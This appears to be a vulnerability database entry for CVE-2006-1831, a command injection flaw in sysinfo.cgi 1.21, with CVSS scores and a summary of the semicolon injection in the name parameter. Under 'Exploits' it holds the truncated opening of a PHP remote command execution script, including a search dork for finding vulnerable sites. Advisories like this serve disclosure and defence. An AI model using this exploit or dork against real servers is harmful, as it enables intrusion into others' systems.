7.5
CVSSv2

CVE-2006-1831

Published: 19/04/2006 Updated: 19/10/2017
CVSS v2 Base Score: 7.5 | Impact Score: 6.4 | Exploitability Score: 10
VMScore: 755
Vector: AV:N/AC:L/Au:N/C:P/I:P/A:P

Vulnerability Summary

Direct static code injection vulnerability in sysinfo.cgi in sysinfo 1.21 and possibly other versions prior to 2.25 allows remote malicious users to execute arbitrary commands via a leading ; (semicolon) in the name parameter in a systemdoc action, which is injected into phpinfo.php.

Vulnerable Product Search on Vulmon Subscribe to Product

coder-world sysinfo 1.21

Exploits

#!/usr/bin/php -q -d short_open_tag=on <? echo "sysinfocgi 121 remote cmmnds xctn \r\n"; echo "by rgod rgod@autisticiorg\r\n"; echo "site: retrogodaltervistaorg\r\n\r\n"; echo "dork: inurl:sysinfocgi ext:cgi\r\n\r\n"; if ($argc<4) { echo "Usage: php "$argv[0]" host path cmd OPTIONS\r\n"; echo "host: target server (ip/host ...